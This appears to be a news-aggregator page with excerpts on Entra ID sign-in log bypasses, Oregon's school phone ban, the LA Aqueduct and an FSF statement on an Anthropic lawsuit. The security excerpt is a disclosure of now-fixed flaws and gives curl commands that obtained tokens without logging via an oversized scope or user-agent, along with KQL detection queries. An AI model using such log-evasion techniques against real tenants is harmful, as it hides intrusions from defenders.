Nyxgeek here. It’s 2026 and I’ve got two more Azure Entra ID sign-in log bypasses to share with you. Don’t get too excited…these bypasses were recently fixed, but I think it’s important that people know.
By sending a specially crafted login attempt to the Azure authentication endpoint, it was possible to retrieve valid tokens without the activity appearing in the Entra ID sign-in logs. This is critical logging…logging that administrators across the world rely on to detect intrusions…logging that could be made optional.
Today I will walk you through the third and fourth Azure sign-in log bypasses that I have found in the last three years. I will also look at how sign-in log bypasses can be detected using KQL queries. By knowing about Microsoft’s past mistakes, we can try to prepare for their future failures.
Since 2023, I’ve uncovered four Azure Entra ID sign-in log bypasses. This means I’ve found four completely different ways to validate an Azure account’s password without it showing up in the Azure Entra ID sign-in logs. While the first two of these merely confirmed whether a password was valid without generating a log, my latest logging bypasses returned fully functioning tokens.
Previously, I had written about GraphNinja and GraphGhost — two logging bypasses where a user could identify valid passwords without generating any ‘successful’ events in the sign-in logs. Neither were overly complicated. You can find blog posts describing them in detail here and here.
Real quick — a point of clarification on the names: while I’ve used Graph- prefix to designate these different bypasses, perhaps it would have been more appropriate to prefix them Entra-, as they were not limited to only Graph sign-ins.
In each of these, the logging being bypassed is for the Azure Entra ID sign-in logs. Logon method is via an HTTP POST to the Entra ID token endpoint, login.microsoftonline.com, using the OAuth2 ROPC flow, with the Graph API as our intended resource/scope. We submit a username and password, an Application ID, and a target resource/scope, and we’ll get a bearer token or refresh token for the Graph API in return.
An example curl command performing a “normal” authentication can be seen below:
curl -X POST “https://login.microsoftonline.com/00000000-1234-1234-1234-000000000000/oauth2/v2.0/token” \
-H “Content-Type: application/x-www-form-urlencoded” \
–data-urlencode “client_id=f05ff7c9-f75a-4acd-a3b5-f4b6a870245d” \
–data-urlencode “client_info=1” \
–data-urlencode “grant_type=password” \
–data-urlencode “[email protected]” \
–data-urlencode “password=secretpassword123” \
–data-urlencode “scope=https://graph.microsoft.com/.default”
When a valid username and password are supplied, a token is returned that can be used to access the Graph API.
In the GraphNinja bypass, it was only necessary to target another tenant with the authentication attempt (e.g., https://login.microsoftonline.com/00000000-1234-1234-1234-000000000000/oauth2/v2.0/token). Any other valid tenant GUID would do, as long as it wasn’t your victim’s. The authentication response would still indicate if a valid password was found, but the login would fail because it was performed against a foreign tenant where the user didn’t exist. No failed or successful authentication log was generated within the parent tenant of the actual user, as the authentication was targeting the foreign tenant. No logs were generated on the foreign tenant because only logs for valid users within that tenant are generated, and the target user did not exist within the foreign tenant. While no token was returned by GraphNinja, it would indicate to an attacker whether the password was valid without the attempt appearing in logs. Additional logging was added by Microsoft to remediate this oversight.
With the GraphGhost bypass, providing an invalid Client ID value would cause the overall authentication flow to fail, but not until after credential validation had occurred. By providing an invalid value for the Client ID, it would fail a post-password-validation step, the overall authentication flow would fail, and this would show to administrators as a failed login, with no indication in logs that the password had been successfully guessed. Like GraphNinja, no token was returned, but the password was validated without any indication to the admin. This issue was fixed by Microsoft with the addition of details in the sign-in logs to indicate whether the password was successful.
Now that you’re caught up on what’s been found in 2023 and 2024, let’s look at the findings from 2025.
Let’s start with what I’m terming GraphGoblin. I stumbled across this bypass while poking at the parameters in the Microsoft authentication POST. Testing the scope parameter, I first tried some simple things like supplying invalid scope values. However, I found that the scope value would be rejected if it wasn’t a valid scope name, or didn’t match an expected format.
AADSTS70011: The provided request must include a ‘scope’ input parameter. The provided value for the input parameter ‘scope’ is not valid. The scope [scope] is not valid. The scope format is invalid. Scope must be in a valid URI form
This error message isn’t 100% honest. You can also just specify specific scopes, such as openid or Directory. Read.All. If the URL or GUID format is used, it will validate the resource being targeted, and then the scope. This validation of the scope values prevented arbitrary long strings from being evaluated.
Or did it? What if the string we submitted WAS valid, but repeating? For instance, instead of specifying a value like openid as the scope, what if we submitted a bunch of the same value, like openid openid openid?
It got through! But did it work at bypassing the logs? I set an alarm for 15 minutes, came back, and checked the Azure Entra ID sign-in logs, and found NO NEW SIGN-INS! W00t! I waited another 15 minutes before really celebrating. Then I tested it with a friend’s tenant, just to be sure. It was a solid bypass.
To show how dead-simple this is, a demonstration of this bypass using curl and Bash expansion can be found below:
export TENANT_ID=“[tenant-guid-goes-here]”
curl -X POST “https://login.microsoftonline.com/${TENANT_ID}/oauth2/v2.0/token” \
-H “Content-Type: application/x-www-form-urlencoded” \
–data-urlencode “client_id=f05ff7c9-f75a-4acd-a3b5-f4b6a870245d” \
–data-urlencode “client_info=1” \
–data-urlencode “grant_type=password” \
–data-urlencode “[email protected]” \
–data-urlencode “password=secretpassword123” \
–data-urlencode “scope=$(for num in {1..10000}; do echo -n ‘openid ’;done)”
There is no way of knowing 100% why this worked without Microsoft publishing information about these issues, but I can take a guess.
Having done a fair bit of logging to databases with various scripts, I believe this was a simple matter of overflowing the SQL column length for a field, causing the entire INSERT to fail. This is a common beginner mistake when you first start to work with databases.
It’s likely that the parser iterated over the list of scopes included, did not find any invalid ones, and so allowed the repetitious entry to pass and attempted to log the raw list of openid openid openid…, in its entirety, overflowing the limit of that SQL column. In testing, a reasonable max length could be assumed to be the sum of the length of all possible scope names. Perhaps they tested for that scenario but never anticipated the repeats. At any rate, if this was the case, they failed to perform simple tests against user-supplied data.
If Microsoft wants to speak publicly about this, I’d love to hear more on it, and to know more about how they approach internal security reviews of their most-critical products.
It’s not often that you see a demo of an actual Azure vulnerability, as they get patched and are gone forever. However, because Microsoft was having trouble replicating this complicated bypass, and asked for a video, I come bearing receipts.
For your viewing pleasure, I present to you what is probably the only Azure sign-in log bypass you’ll ever see:
In the following demo I am about to perform a series of three login attempts.
The first attempt will be a failed login that generates a normal failed sign-in log. This failed sign-in also generates a ‘Correlation ID’ that we can use as a reference point in our logs. In the second attempt, I’ll authenticate using the GraphGoblin sign-in log bypass technique.Then, I’ll make one final normal failed attempt, so we have another Correlation ID as a marker.
If all of the following attempts are properly logged, the sign-in logs should show:
Below is a screenshot of the Entra ID sign-in logs. Note the Correlation ID of the last log, and the time. It is dated 9/20/2025, at 1:49:20 PM, with a Correlation ID starting with 1dfe62e9-.
In the screenshot below, you can see the source of that failed login; note that the time and Correlation ID match.
In the above image, below the failed login, you can see a valid login and a timestamp. The valid login occurs on 9/20/2025 at 13:52:38. The difference is, this time, I’m using the GraphGoblin bypass that will make this login event invisible. The login is successful and we can see a bearer token is returned.
In the following screenshot, I export the token to the variable TOKEN so we can easily use it with curl. I then demonstrate that the token is valid by making a Graph API request with it.
Now, to make it clear when reviewing logs, I’m going to make an invalid login attempt, without the bypass. This will give us a Correlation ID to use as another marker point.
Note that the attempt is from 9/20/2025 at 19:01:45 and has a Correlation ID that starts with 0d5ea4f0-. As a reminder, the first failed login had a Correlation ID that starts with 1dfe62e9-.
If we wait 10 minutes for logs to ingest then review the logs, we see our Correlation ID starting with 0d5ea4f0- is directly after our previous failed login with an ID that starts with 1dfe62e9-. No successful login is shown.
I then make a NORMAL valid login, without the logging bypass, to show that logs are still flowing.
And, we can see the regular, successful authentication come in, but still no sign of the GraphGoblin method.
After posting a video of the bypass to Twitter/X a while back, people were curious if it was a matter of the sign-in logs not displaying them in the Azure portal GUI, or if it was truly being dropped.
Reviewing the log analytics, I can confidently say that these were dropped entirely from the sign-in logs. In the demo video, I had sent a normal request with a user-agent of MARKER 1 — BEFORE THE BYPASS. After performing multiple authentications using the logging bypasses, I sent another normal request with a user-agent of MARKER 2 — AFTER THE BYPASS. In my Log Analytics workspace, we can see that none of the bypassed sign-in logs made it to Log Analytics. Only our MARKER 1 and MARKER 2 entries are visible from our tests.
Okay, so I mentioned that I had found a FOURTH bypass. This one was ridiculously simple, and it’s related to GraphGoblin. Can you guess what logon parameter was vulnerable?
I’ll give you a hint: This field is customized regularly.
Another hint: If you were going to perform fuzzing of a critical web-based authentication system and its logging, you would DEFINITELY want to include this field in your testing.
Did you guess it? If you guessed the USER-AGENT field, you’re RIGHT!
The secret to abusing this field so that it wouldn’t generate an authentication log? You make the user-agent string really long. A total of 50,000 characters in the user-agent worked reliably. That’s it. No special trick, just a long string.
Here is a screenshot of the bypass in action:
Again, I would guess this was the result of overflowing a SQL column limit.
Here is a screenshot where I made a failed login to generate a Correlation ID that starts with c542178e:
And here is a screenshot of a search in my logs from October 09, 2025, looking for that Correlation ID in the last month’s logs. As you can see, no log with the Correlation ID was found, indicating the bypass was successful.
I discovered this on 9/28/2025, and a week later when I went back to write up a report on it, Microsoft had already fixed it! I’m not sure how they noticed and fixed this issue without also noticing and fixing GraphGoblin, but they did.
* 1/7/2025 Microsoft is unable to reproduce this so I make them a video
* 11/21/2025Finally reproduce and start to roll out fix
* 12/1/2025Re-escalated within MSRC re: bounty and severity, no change
What’s going on here, Microsoft?
To review, here are the parts of a logon POST that had flaws that enabled the Azure Entra ID sign-in log bypasses. I’ve compiled them into one screenshot so you can see how many login parameters have had issues identified.
This is the gatehouse that secures hundreds, even thousands, of organizations. How is it possible that so many parts of this critical feature were so woefully untested? None of the bypasses that I’ve submitted these last few years were complicated. Yet, somehow, Microsoft’s security review of Entra ID missed all of them.
Were issues introduced with AI coding? Anybody who has worked with AI for coding knows that it 100% can (and often will) drop portions of your code when revising it. Or did these issues get introduced slowly over the years? Or, have these problems all been there since the start of Azure over a decade ago? Unfortunately, we will never know. Again, I invite Microsoft to speak publicly on these repeated failings.
Four sign-in log bypasses in the last three years, for what is arguably the most important log of all of Azure. This doesn’t bode well for admins who rely on these logs as a source of truth. So what can you do, short of moving back to on prem? Well, if you shell out the cash for an E5 license, you can still detect malicious activity, in spite of Microsoft’s failures.
After finding these last two bypasses, I started to see if I could identify traffic from these bypassed sessions. I had been collecting Graph activity in a Log Analytics workspace along with Sign-In logs. While reviewing logs I noticed that the Sign-In logs and the Graph Activity logs both had a Session ID field. Perfect! It should be possible to take a list of all unique Session IDs from the Graph Activity logs and find a corresponding Session ID in the sign-in logs. Any Session IDs that only show up in the Graph Activity logs, and don’t exist in any sign-in logs, must have bypassed the sign-in logs. Note for defenders: you will need an E5 license to collect the Graph Activity logs.
I started off with a simple query, ran it on my small test tenant, and voilà! I had a list of Graph activity belonging to my bypassed sessions.
However, it soon became apparent, when testing the detection with a client at a larger organization, that there was a lot of possible ‘noise’ to account for. My simple checks didn’t take into account noninteractive logins, nor service principal logins.
For a while, I was at an impasse. However, I soon found that somebody else had already thought of this, and had implemented it! Fabian Bader has a post covering exactly this in his fantastic write-up, Detect threats using Microsoft Graph activity logs - Part 2.
There is an entire section on finding missing sign-in logs!
This method incorporates additional sources of sign-ins that I had not, including from service principals, managed identities, and noninteractive user sign-ins. Instead of joining on SessionId values, this KQL performs the JOIN on the more fine-grained properties — GraphActivity. SignInActivityId SignInLogs.UniqueTokenIdentifier.
I still had a little bit of noise, but I added the MicrosoftServicePrincipalSignInLogs to the list of Sign-In sources and it mostly cleared up.
MicrosoftGraphActivityLogs
| where TimeGenerated > ago(8d)
| join kind=leftanti (union isfuzzy=true
SigninLogs,
AADNonInteractiveUserSignInLogs,
AADServicePrincipalSignInLogs,
AADManagedIdentitySignInLogs,
MicrosoftServicePrincipalSignInLogs
| where TimeGenerated > ago(90d)
| summarize arg_max(TimeGenerated, *) by UniqueTokenIdentifier
on $left.SignInActivityId == $right.UniqueTokenIdentifier
If the above query returns false-positives, you might want to experiment with matching on the broader matching variable, SessionId instead:
MicrosoftGraphActivityLogs
| where TimeGenerated > ago(8d)
| join kind=leftanti (union isfuzzy=true
SigninLogs,
AADNonInteractiveUserSignInLogs,
AADServicePrincipalSignInLogs,
AADManagedIdentitySignInLogs,
MicrosoftServicePrincipalSignInLogs
...
Read the original on trustedsec.com »
Skip to content
You signed in with another tab or window. Reload to refresh your session.
You signed out in another tab or window. Reload to refresh your session.
You switched accounts on another tab or window. Reload to refresh your session.
You must be signed in to star a gist
You must be signed in to fork a gist
Embed this gist in your website.
Save mattmanning/1002653 to your computer and use it in GitHub Desktop.
Embed this gist in your website.
Save mattmanning/1002653 to your computer and use it in GitHub Desktop.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
You can’t perform that action at this time.
...
Read the original on gist.github.com »
Swipe or click to see more
Gov. Tina Kotek visited Estacada High School to hear how her cell phone ban has been going. (Staff photo: Christopher Keizur)
Swipe or click to see more
Gov. Tina Kotek said she chose Estacada High for her visit because of the positive things happening within the district. (Staff photo: Christopher Keizur)
Swipe or click to see more
Swipe or click to see more
Swipe or click to see more
Swipe or click to see more
There was plenty of uncertainty and debate about the effectiveness of a cell phone ban decreed by executive order last summer.
But at least in Estacada, the policy has earned two thumbs up, including approval from a “grumpy old teacher.”
Jeff Mellema is a language arts teacher at Estacada High School. He has worked in the building for 24 years, and he said the new policy that prohibits students from using their phones during the day has been a breath of fresh air.
“There is so much better discourse in my classroom, be it personal or academic,” Mellema said. “Students can’t avoid those conversations anymore with their phones.”
“This ban has brought joy back to this old, grumpy teacher,” he added with a smile.
That is the kind of feedback Gov. Tina Kotek was hoping for as she visited Estacada High School on Wednesday afternoon, March 18. Her goal was to visit classrooms, speak with administrators, and meet with students one-on-one to hear about the effectiveness of her phone policy.
“I knew when I put out the order, not everyone would love it from day one,” Gov. Kotek said. “I appreciate all the feedback today.”
“You have an amazing school. Go Rangers,” she added with a smile.
For years, educators had reported that cell phones were disruptive in classrooms and hindered effective teaching. Research supported those anecdotal claims, showing that phones undermine students’ ability to focus, even when they are just sitting on the desk, unused.
So the governor issued her executive order prohibiting cell phone use by students during the school day in Oregon’s K-12 public schools. To help implement the ban, her office worked with the Oregon Department of Education to share model policies for schools that already have prohibitions in place, as well as guidance on implementation flexibility.
“We are grateful to have Governor Kotek here today to see with her own eyes the positive effect this has had,” said Estacada Superintendent Ryan Carpenter. “We can now demand this expectation for our students’ well-being and success.”
Since that order was issued, every single public school district in Oregon is in compliance with the band.
“The goal is for every student to have the best opportunity to be successful,” Kotek said. “They need to know how to talk to people, learn, and go out into the world.”
The governor visited two classrooms during her trip to Estacada High — Mr. Schaenman’s history class and Mrs. Hannet’s algebra class. Gov. Kotek assured the kids that she still uses algebra in her day-to-day life, no matter how unlikely that may seem to the youngsters.
In the classrooms, she was able to take a straw poll around the cell phone ban and then get specific, direct feedback from the kids.
Overall, it was positive. The Rangers said they noticed changes in how they interact with teachers and peers. They don’t feel that “siren’s song” tug of their phones as often, and the changes are bleeding into everyday life as well — think less reminders to put phones away during family dinners. Phones also led to issues around bullying and online toxicity during the school day.
There are some hiccups. The students spoke about difficulties in tracking busy schedules. Many athletes relied on their phones for practice times and locations. Some advanced placement kids said the overzealous programs monitoring school laptops blocked access to needed resources for studying/researching schoolwork. There is even a strange quirk with school-provided tech that prevents them from accessing their calculators.
“Maybe the filters are too strong right now,” Gov. Kotek said. “That is why we are working with the districts to best implement the policy.”
The kids also weighed in on the debate around the extent of the ban. The two options bandied in Salem were a “bell-to-bell” policy or just inside classrooms. The latter would allow kids to use their phones during passing period and lunch. Several advocated for that change.
That mirrored the debate within the Oregon legislature. It ultimately led to a stalemate and the need for Gov. Kotek’s executive ruling.
“When you make a decision like this, you don’t know how it will ultimately work,” Kotek told the students. “I appreciate you adapting to the situation and making it work for you.”
While things could change in the future, the governor is pleased with the early results. The phone ban is here to stay.
Estacada School District is reveling in its status of public school “Golden Child.”
The visit from the governor is the latest feather in the cap of the rural, small district. In 2025, Estacada High had a 92.5% graduation rate. That is a stunning turnaround from a record-low of 38.5% in 2015. The district credits policies aimed at retaining talented teachers and empowering students to take a more active role in their learning.
“We are proud of these results,” Carpenter said. “This is a reflection and reward for a ton of hard work. This district literally changed its stars to be seen as a true academic powerhouse in Oregon.”
That mindset continues with the cell phone ban. Like many others, Estacada had a version of this in place before the official edict. But with the governor’s push, it empowered administrators and teachers to learn fully embrace the ban.
“Any policy is only as good as the teachers who enforce it,” Carpenter said.
In crafting its policy, Estacada incorporated feedback from parents. That led to some key decisions around the cell phone ban. Rather than use pouches or lockers, students are allowed to keep their phones safely stored in their backpacks. That was for two reasons — it allows students to contact loved ones during emergencies, and many parents use phone trackers to keep tabs on their kids.
The district has also leaned on direct, immediate communication. The flow of information reaches parents directly, avoiding some of the miscommunication that occurred in the past.
“Even I’m surprised by the impact this has had,” Kotek said. “I’m thankful for the educators who took up the charge when I said we’ve got to do this.”
“We can model what Estacada is doing for other districts across the state,” she added.
Oregon voters have rejected most laws in referendums, with many decided outside November
Now’s the time to see Portland cherry blossoms in peak bloom
...
Read the original on portlandtribune.com »
[Note that this article is a transcript of the video embedded above.]
On the northern edge of Los Angeles, fresh water spills down two stark concrete chutes perched on the foothills of the San Gabriel Mountains, a place simply called The Cascades. It’s a deceptively simple-looking finish line: the end of a roughly 300-mile (or 500 km) journey from the eastern slopes of the Sierra Nevada into the city.
On November 5, 1913, tens of thousands of people climbed these hills to watch the first water arrive. When the gates finally opened, water trickled through, but that trickle quickly became a torrent. The project’s chief engineer, William Mulholland, leaned over to the mayor and shouted the line that’s been repeated ever since: “There it is, Mr. Mayor. Take it!”
That moment was profound for a lot of reasons, depending on where you live and how you feel about water rights. LA didn’t become LA by living within the limits of its local resources. Its meteoric growth into the metropolis we know was enabled by an early and extraordinary decision to reach far beyond its own watershed and pull a whole new river into town. Today, roughly a third of LA’s water comes from the Eastern Sierra through the Los Angeles Aqueduct system. That share swings with snowpack, drought, and environmental constraints, but this one piece of infrastructure helped turn a water-limited town into a world city. It’s one of the most impressive and controversial engineering projects in American history.
But to really appreciate that water in the cascades, you have to look way upstream and see what it took to get it there. It’s gravity, geology, politics, and human ambition all in a part of the state that most people never see. Let’s take a little tour so you can see what I mean. I’m Grady and this is Practical Engineering.
When most people think about aqueducts, this is what they picture: a bridge carrying water over a valley or river. And, just to be clear, these are aqueducts. But engineers often use the term more broadly to describe any type of conveyance system that carries water over a long distance from a source to a distribution point. Could be a canal, a pipe, a tunnel, or even just a ditch. In the case of the LA aqueduct, it’s all of them, plus a lot of supporting infrastructure as well.
From the center of the city, it’s about a four hour drive to the Owens River Diversion Weir. It’s not accessible to the public, but it is the official start of the LA Aqueduct, at least when it was originally built. Here, all the snowmelt and rain from a huge drainage system between the Sierra Nevada and Inyo Mountains funnel down into the Owens River, where a large concrete diversion weir peels nearly all of it out of its natural course and into a canal. This point is roughly 2,500 feet (or 750 meters) higher in elevation than the bottom of the Cascades at the downstream end, which makes it obvious why LA chose it as a source. The entire aqueduct is a gravity machine. There are no pumps pushing the water toward the city. Half a mile of elevation change feels like a lot until you realize you have to spread it out over 300 miles. It’s all achieved through careful grading and managing elevations along the way to keep the flow moving.
That care is particularly important in this upper section of the aqueduct, where the water flows in an open canal. To do this efficiently, you need a relatively constant slope from start to finish. That’s a tough thing to achieve on the surface of a bumpy earth. Following a river valley makes this easier, but you can see the twists and turns necessary to keep the aqueduct on its gentle slope toward LA.
If it seems kind of wild that a city would buy up the land and water rights from somewhere so far away, it did to a lot of the people who lived in the Owens Valley, too. A lot of the acquisitions and politics of the original LA Aqueduct were carried out in bad faith, souring relationships with landowners, ranchers, farmers, and communities in the area. The saga is full of broken promises and shady dealings. Then when the diversion started, the area dried up, disrupting the ecology of the region, making agriculture more difficult and residents even more resentful. Many resorted to violence, not against people but against the infrastructure. They vandalized parts of the aqueduct, a conflict that later became known as the California Water Wars. In one case in 1924, ranchers used dynamite to blow up a part of the canal. Later that year, they seized the Alabama Gates.
About 20 miles or 35 kilometers downstream from the diversion weir, a set of gates sits on the eastern bank of the aqueduct canal. Because it runs beside the river valley, the aqueduct captures some of the water that flows down from the surrounding mountains in addition to what’s diverted out of the Owens River, particularly during strong storms. That means it’s actually possible for the canal to overfill. The Alabama Gates serve as a spillway, allowing operators to divert water back down to the river. This also helps drain the canal for maintenance or repairs when needed.
Those Owens Valley ranchers understood exactly what the Alabama Gates controlled. Open them, and the water would run back where it had always run, down the Owens River, instead of south to Los Angeles. The resistance simmered and flared for years, but it didn’t end in the dramatic showdown at the aqueduct. Instead, it ended at a bank counter. The Inyo County Bank was run by two brothers who were also key organizers and financiers of the resistance campaign. In August 1927, an audit revealed major shortfalls and ongoing embezzlement, and the bank quickly collapsed. Residents across the valley saw their savings wiped out or frozen overnight, shattering what was left of the community’s ability to keep fighting.
The Alabama Gates weren’t just a political flashpoint though. They also marked an important dividing line in the aqueduct’s design. LA knew that even if the ranchers didn’t release the water to the river in protests, a lot of it would end up there anyway through seepage. As the canal climbed away from the valley floor and crossed more porous soil, it would naturally lose its water through the ground. So, at the Alabama Gates, the aqueduct transitions from an unlined canal to a concrete-lined channel. It’s still open to the air, so there’s no protection against evaporation or contamination, but the losses to the ground are a lot less.
This design continues for about 35 miles (or 55 kilometers) through the valley. Along the way, the aqueduct passes the remains of Owens Lake. Once a large body of water, it quickly dried up with the diversion of the Owens River. Of course, there were impacts to wildlife from the loss of water, but the bigger problem came later: dust. All the fine sediment that settled on the lakebed over thousands of years was now exposed to the hot desert sun. When the wind picked up, it filled the air with fine particulates that are dangerous to breathe. Over the years, there have been times when Owens Lake is the single largest source of dust pollution in the entire country, and LA has spent more than a billion dollars just trying to fix this problem alone. The aqueduct passing along the hillside past the lake and its challenges is a reminder that the true cost of water is often a lot more than the infrastructure it takes to deliver it.
So far, it might be obvious that this aqueduct system is pretty fragile to be making up a major part of a city’s fresh water supply. Even beyond the vandalism and political resistance, there are a lot of things that could go wrong along the way, from bank collapses, earthquakes, diversion failures, and more. That’s why Haiwee Reservoir was originally built in a narrow saddle between two hills as a kind of buffer. With a dam on either side, it stored water up so the aqueduct could keep running even during a disruption upstream. It also slowed the water down, exposing it to the hot desert sun as a natural form of UV disinfection. In the 1960s, the reservoir was reconfigured into two basins to add some flexibility. That’s because, around that time, the LA aqueduct became two. While the open-topped canal section was large enough to meet demands, the underground conduit in the next section wasn’t. So, LA built a second one in 1970 to increase the flow. If you look at this map of the Haiwee Reservoirs, you can see that water has two paths: it can flow into the second aqueduct here from the north basin, or it can pass through the Merritt Cut to the south reservoir, through the intake there, and into the first aqueduct. This setup allows for some redundancy, along with regulation and balancing of the flows between the two aqueducts. Haiwee marks the start of the long desert run, with both systems no longer in open-topped lined canals, but running underground in concrete conduits.
There are a lot of advantages to running an aqueduct in a closed conduit underground, especially one this long through a desert landscape. There’s far less evaporation and less potential for contamination. It doesn’t divide the landscape at the surface level, so there’s no need for bridges, culverts, and wildlife crossings. Going underground also offers more flexibility when it comes to topography. You don’t have to follow the contours of the surface so carefully because if you come to a hill, you can just dig a little deeper to keep the constant slope.
Of course, those benefits come with a cost. An underground conduit is more expensive than a simple channel on the surface, and not all the problems with topography are solved. This is Jawbone Canyon, one of the biggest drops for the first aqueduct. Rather than taking a major detour around it, the aqueduct descends 850 feet (or 250 meters) and then ascends back up. This type of structure is often called an inverted siphon. I’ve done a video on how these work for sewer systems, and I’ve also done a video on flood tunnels that work in a similar way, if you want to learn more after this.
Unlike the concrete conduit, which really just acts like an underground canal with a roof, this is one of the places where the water in the aqueduct is pressurized. 850 feet of water column is about 370 psi, 26 bar, or two-and-a-half Megapascals. It’s a lot of pressure. These sections of pipe had to be specially manufactured on the East Coast, where the major steel facilities were, and transported by ship because of their size. They travelled all the way around Cape Horn, since the Panama Canal was still under construction. There are actually quite a few of these siphons crossing canyons in this section of the aqueduct, but Jawbone Canyon is the biggest one.
A little further downstream, the LA aqueduct crosses the California Aqueduct, part of the State Water Project. That system has a connection to LA as well, but this branch at the crossing actually heads to Silverwood Lake. However, there is a transfer facility, recently completed, that can pump water out of the California Aqueduct directly into the first LA aqueduct. This creates opportunities for LA to buy water that moves through the state system and offers some flexibility in where that water ends up. There’s also a turn-in that can move water from the LA aqueduct into the California aqueduct for situations where trades make sense. The second LA aqueduct passes underneath the state canal here. And this is a good example of the differences between the first project (built in the 1910s) and the second one, built in the 1960s. Over that time, the price of labor went up a lot more than the price of materials. Where the first one carefully followed the existing topography with bends and turns to minimize the need for expensive pressurized pipe, the second one could take a more direct path, reducing labor in return for the more specialized conduit materials.
After wandering more than a hundred miles (or 160 kilometers) apart, the two Los Angeles Aqueducts come back together at Fairmont Reservoir, in the northern foothills of the Sierra Pelona Mountains. This is the last major topographic barrier on the way to Los Angeles. There was no way to go up and over without pumps, so instead they went straight through. The largest project was the Elizabeth tunnel.
Here, the two aqueducts come together again into a single watercourse. About 5 miles or 8 kilometers of excavation through everything from hard rock to loose, wet ground became one of the most difficult parts of the entire project. The tunnel required continuous temporary supports along most of its length, followed by a permanent concrete lining. It was a monumental effort for its time and essential not only to cross the range. The Elizabeth Tunnel also delivers that water under pressure to the San Francisquito Power Plant Number 1.
This is the largest of the eight hydroelectric plants that run along the aqueduct, capturing some of the energy from the water as it flows downward toward LA. These plants are a major part of how the project paid for itself, and they continue to serve as an important source of electricity in the region today.
Continuing downstream, Bouquet Canyon reservoir adds another layer of operational flexibility. It helps regulate flow through the power plants and provides additional storage, a sort of insurance policy since this whole reach depends on a single major tunnel crossing the San Andreas Fault. In case of a major earthquake, it’d be best if Angelinos could avoid a simultaneous water shortage.
The aqueduct splits again just upstream of the San Francisquito Plant Number 2, which was famously destroyed by the St. Francis Dam failure. That reservoir project was designed to supplement the storage capacity along the aqueduct, but the dam failed catastrophically in 1928, just 2 years after it was completed, killing more than 400 people and destroying several parts of the aqueduct as well. The tragedy was one of the worst engineering disasters in American history. It put another stain on the aqueduct project, and it effectively ruined the reputation of William Mulholland, who was largely considered a hero in LA for all his work on the aqueduct and the city’s water system. The dam was never rebuilt, but workers restored the aqueduct to functioning service in only 12 days.
At Drinkwater Reservoir, the two aqueducts run roughly parallel through the Santa Clarita area, sometimes aboveground and sometimes below, before finally reaching the terminal structures that carry water into LA. Usually, the water stays in the conduits, which feed the two hydropower plants at the foot of the mountains. If the plants are out of service or there’s more flow than they can handle, you see excess water thundering through the cascade structures instead.
From here, the aqueduct drops out of the mountains and into the north end of the San Fernando Valley, where the water is treated and prepared for distribution. After filtration and disinfection, it’s stored in the Los Angeles Reservoir, the system’s terminal reservoir, so the city can smooth out day-to-day swings in demand even while the aqueduct’s inflow stays relatively steady.
For most of Los Angeles’ history, that “finished water storage” was out in the open air. But in the 2000s, drinking-water rules pushed utilities to add stronger protection for treated water held in uncovered reservoirs. There’s a good chance you’ve seen their solution on the Veritasium channel or elsewhere: 96 million plastic shade balls that act like a floating cover, blocking sunlight to prevent water-chemistry problems and helping keep wildlife out. They’re the final protection for this water that traveled so long to reach the city. While the LA Reservoir is, in a sense, the end of the journey for this water, the original diversion way back at Owen’s River isn’t even technically the start anymore!
In 1940, LA extended the aqueduct system upstream northward by connecting the Mono basin and funneling its water through tunnels to the Owens River basin. Like Owens Lake downstream, Mono Lake began drying out as well. And also like Owens Lake, lawsuits, court orders, and environmental regulations have tempered the value of this water source, forcing LA to significantly reduce diversions and implement costly restoration projects.
That’s kind of the story of the LA aqueduct in a nutshell. The project seemed obvious from an engineering perspective. There was lots of snowmelt in the mountains; the city had the technical prowess, the funding, the elevation, and the political power to reach out and take it. The result was one of the most impressive works of infrastructure of the early 20th century. And continued efforts to expand and improve the system have made it even more efficient, flexible, and valuable to the many millions of people who live in one of the most populous cities in America, delivering not only water but also hundreds of megawatts of hydropower.
But it many ways, it was not only unscrupulous, but also short-sighted. Residents of the Owens Valley watched ranchland and farmland dry up as the water that had shaped their home was rerouted south. Native communities saw their homeland transformed with access to gathering areas disrupted, places made unrecognizable, and cultural ties strained by changes they didn’t choose. Wind picked up alkaline dust from dried lakebeds. Habitats were disrupted, and the birds that depended on these waters and wetlands lost part of what made this migration corridor work. It’s easy to see why the aqueduct remains controversial, and why what we sometimes dismiss as “red tape” around major infrastructure is often completely justified due diligence. As engineers, and really, as humans, we have to try and account for costs that don’t show up on a balance sheet, but can come back later as decades of lawsuits, mitigation, and restoration.
And even the aqueduct’s original thesis (that there’s reliable snowmelt up there, and a growing city down here) is starting to falter. In recent decades, the mountains have delivered less predictable runoff: more swings, more years when the timing is wrong, and more uncertainty about what “normal” even means anymore. California’s climate has always moved in long cycles, but the margin for error is thinner now, and no one can say with much confidence when or if the moisture the state depends on will return to its old pattern.
The hopeful part is that this is exactly where engineering makes a difference: at the messy intersection of geology, climate, culture, politics, and human need. The Los Angeles Aqueduct is a case study in what we can build when we’re ambitious, but also what happens when we treat a landscape like a machine with only one output. The next era of water engineers can learn a lot from it.
...
Read the original on practical.engineering »
The Free Software Foundation (FSF), like many others, received a notice regarding settlement in the copyright infringement lawsuit Bartz v. Anthropic. It is a class action lawsuit claiming that Anthropic infringed copyright by downloading works in Library Genesis and Pirate Library Mirror datasets for purposes of training large language models (LLMs). According to the notice, the district court ruled that using the books to train LLMs was fair use but left for trial the question of whether downloading them for this purpose was legal. Apparently, the parties agreed to settle instead of waiting for the trial and they are now reaching out to potential copyright holders to offer money in lieu of potential damages.
The FSF holds copyrights to many programs in the GNU Project, as well as to several books. We publish all works that we hold copyrights to under free (as in freedom) licenses. Among the works we hold copyrights over is Sam Williams and Richard Stallman’s Free as in freedom: Richard Stallman’s crusade for free software, which was found in datasets used by Anthropic as training inputs for their LLMs. It was published by O’Reilly and by the FSF under the GNU Free Documentation License (GNU FDL). This is a free license allowing use of the work for any purpose without payment.
Obviously, the right thing to do is protect computing freedom: share complete training inputs with every user of the LLM, together with the complete model, training configuration settings, and the accompanying software source code. Therefore, we urge Anthropic and other LLM developers that train models using huge datasets downloaded from the Internet to provide these LLMs to their users in freedom. We are a small organization with limited resources and we have to pick our battles, but if the FSF were to participate in a lawsuit such as Bartz v. Anthropic and find our copyright and license violated, we would certainly request user freedom as compensation.
...
Read the original on www.fsf.org »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.